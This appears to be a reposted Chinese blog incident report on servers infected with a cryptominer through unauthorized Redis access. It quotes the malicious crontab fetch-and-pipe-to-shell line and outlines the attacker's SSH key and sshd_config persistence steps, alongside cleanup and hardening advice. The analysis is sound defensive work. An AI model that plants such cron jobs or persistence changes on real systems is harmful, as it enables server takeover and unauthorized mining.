博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
redis未授权访问导致的安全问题
阅读量:6975 次
发布时间:2019-06-27

本文共 645 字,大约阅读时间需要 2 分钟。

hot3.png

近日公司多个线上服务器发生CPU使用率过高、及crontab改动触发的报警,登录后检查发现被植入挖矿木马。经分析,这些被植入恶意木马的主机均存在redis服务。推测中招的可能为服务器因需暂时关闭火墙,导致“redis未授权访问”引发而产生安全问题。

对其进行分析,crontab植入计划任务: */10 * * * * curl -fsSL  | sh

下载pm.sh脚本,分析知,通过redis未授权访问的漏洞,通过authorized_keys免密码登录后,修改计划任务下载恶意脚本并执行,同时在/root/.ssh/目录下创建KHK75NEOiq文件,修改AuthorizedKeysFile的指向,删除authorized_keys文件,并修改sshd_config配置文件,同时让恶意文件依附于ntp进程,在/opt目录下生成恶意文件,如下所示:

               

         在之前的安全检测中,发现多个挖矿木马进程,或者说起了不同的名字:minerd、yam……。如下所示:       

               

                              

当存在以上进程时,可能会同时存在一个被恶意植入进程lady,如果存在,需立即service lady stop。

针对以上问题的处理也比较容易,根据恶意脚本反推即可。同时要注意redis服务的安全配置。我们之前已对redis服务及防火墙策略做了安全加固,但由于某些主机可能需要暂时关闭火墙的瞬间,给恶意攻击者以可趁之机。

 

文章归档:

转载于:https://my.oschina.net/secscorpio/blog/792872

你可能感兴趣的文章
Oracle Install
查看>>
错误记录 "MongoClient opened before fork. Create MongoClient "
查看>>
第十二次作业
查看>>
第136天:Web前端面试题总结(理论)
查看>>
iOS开发-模板方法模式
查看>>
算法-最大连续子序列和
查看>>
NodeJS之Mac初体验
查看>>
勾股数
查看>>
zoj 1597 Circular Area
查看>>
v-solt插槽
查看>>
OCM_第六天课程:Section3 —》数据库可用性
查看>>
ORA-00257 archiver error. 错误的处理方法
查看>>
开发Servlet的方法(2)
查看>>
Apache mod_wsgi部署Django项目
查看>>
玲珑杯#20 C 漆黑的太阳——莫队
查看>>
MySQL数据库建立外键失败的原因总结
查看>>
网络资源收集工具编码规范
查看>>
ZOJ3778 Talented Chef(贪心)
查看>>
iOS上的反射用法
查看>>
CF1072A Palindromic Twist 思维
查看>>